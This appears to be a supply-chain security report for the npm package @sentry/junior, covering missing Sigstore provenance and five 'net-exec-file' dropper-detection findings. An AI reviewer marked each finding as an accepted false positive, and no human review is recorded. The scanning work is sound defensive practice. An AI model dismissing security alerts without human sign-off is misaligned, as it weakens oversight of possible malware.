@sentry/junior
`@sentry/junior` is a Slack bot package built on [Hono](https://hono.dev/).
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:dist/chunk-5UJSQX4R.js | AI (source-diff): Sample shows plugin discovery via fs APIs, not network+exec dropper pattern; stable false positive for this package. | ai | |
| source-diff | net-exec-file:dist/chunk-DPTR2FNH.js | AI (source-diff): Readable application code for an AI chat agent; network+exec pattern is legitimate for this package's purpose. | ai | |
| source-diff | net-exec-file:dist/chunk-RKOO42TW.js | AI (source-diff): File contains plugin discovery via fs APIs, not network+exec dropper pattern; stable false positive for this package. | ai | |
| source-diff | net-exec-file:dist/chunk-BKYYVLVN.js | AI (source-diff): Plugin registry/discovery code; legitimate filesystem scanning for AI agent framework, not dropper behavior. | ai | |
| source-diff | net-exec-file:dist/chunk-OZFXD5IG.js | AI (source-diff): Bundled chat-agent application code; network calls and dynamic execution are part of legitimate AI SDK usage, not malware. | ai |
v0.2.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.1.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.1.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.